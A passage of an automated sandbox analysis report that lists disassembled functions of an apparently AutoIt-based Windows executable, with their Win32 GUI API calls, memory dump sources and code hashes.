                                                                                                                                                  • GetDesktopWindow.USER32 ref: 004849DF
                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 004849E6
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00484A74
                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                                                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                                                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                                                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00484B29
                                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                                                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00484B70
                                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                                                                                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00484BC7
                                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                                                  • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                                                                                                                  • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                                                                                                                                                  • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                                                                                                                  • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                                                                                                                                                  Function 004027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004029CA
                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                                                                                                                                    • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                                                                                                                    • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                                                                                    • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                                                                                    • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                                                  • Opcode ID: 57a12ef2fd1b91479b9d2327a55d351e13c33843b71dd519b67db9d0605663e4
                                                                                                                                                  • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                                                                                                                                                  • Opcode Fuzzy Hash: 57a12ef2fd1b91479b9d2327a55d351e13c33843b71dd519b67db9d0605663e4
                                                                                                                                                  • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                                                                                                                                                  Function 0043A8CB Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 211COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                                                                  • String ID: {nB${nB
                                                                                                                                                  • API String ID: 884005220-2006378465
                                                                                                                                                  • Opcode ID: bd4a17579a1b678117188557effd8d190a69db8842cd4d944b56fcfc266bcd87
                                                                                                                                                  • Instruction ID: 38b29a3dd0b2171ed88fba709932f654a7c922a32c380ed0e5f01bc2022fc850
                                                                                                                                                  • Opcode Fuzzy Hash: bd4a17579a1b678117188557effd8d190a69db8842cd4d944b56fcfc266bcd87
                                                                                                                                                  • Instruction Fuzzy Hash: 056129B2640211AFEB106F25DD01B6E77A4EF08335F29552FE880A7291DB7C9911C75E
                                                                                                                                                  Function 0045A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                                                                                                                                                  • __swprintf.LIBCMT ref: 0045A51B
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0045A52E
                                                                                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0045A5BF
                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0045A648
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0045A67E
                                                                                                                                                  • GetParent.USER32(?), ref: 0045A69C
                                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 0045A6A3
                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0045A731
                                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0045A76B
                                                                                                                                                    • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                                                  • String ID: %s%u
                                                                                                                                                  • API String ID: 3744389584-679674701
                                                                                                                                                  • Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                                                                                                                  • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                                                                                                                                                  • Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                                                                                                                  • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                                                                                                                                                  Function 0045AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0045AF29
                                                                                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                                                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0045AF8C
                                                                                                                                                  • _wcsstr.LIBCMT ref: 0045AF9D
                                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0045AFE5
                                                                                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0045B065
                                                                                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                                                                                                                                                  • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                  • String ID: @$ThumbnailClass
                                                                                                                                                  • API String ID: 1788623398-1539354611
                                                                                                                                                  • Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                                                                                                                  • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                                                                                                                                                  • Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                                                                                                                  • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                                                                                                                                                  Function 0048C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                                                                                                                                                    • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                                                                                    • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                                                                                    • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                                                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                                                                                                                                                  • _wcscat.LIBCMT ref: 0048C6EE
                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                                                                                                                                                  • DragFinish.SHELL32(?), ref: 0048C75E
                                                                                                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                                                                                                                                                  • API String ID: 169749273-3863044002
                                                                                                                                                  • Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                                                                                                                  • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                                                                                                                                                  • Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                                                                                                                  • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                                                                                                                                                  Function 0045ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                  • API String ID: 1038674560-1810252412
                                                                                                                                                  • Opcode ID: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
                                                                                                                                                  • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                                                                                                                                                  • Opcode Fuzzy Hash: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
                                                                                                                                                  • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                                                                                                                                                  Function 00474FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                                                                                                                                                  • GetCursorInfo.USER32(?), ref: 004750C8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Cursor$Load$Info
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2577412497-0
                                                                                                                                                  • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                                                                                                  • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                                                                                                                                                  • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                                                                                                  • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                                                                                                                                                  Function 0048A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 0048A259
                                                                                                                                                  • DestroyWindow.USER32(?,?), ref: 0048A2D3
                                                                                                                                                    • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                                                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 0048A3A4
                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0048A40D
                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0048A414
                                                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                                                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                                                                                                                                                    • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                                                  • API String ID: 1297703922-3619404913
                                                                                                                                                  • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                                                                                  • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                                                                                                                                  • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                                                                                  • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                                                                                                                                                  Function 00484392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00484424
                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
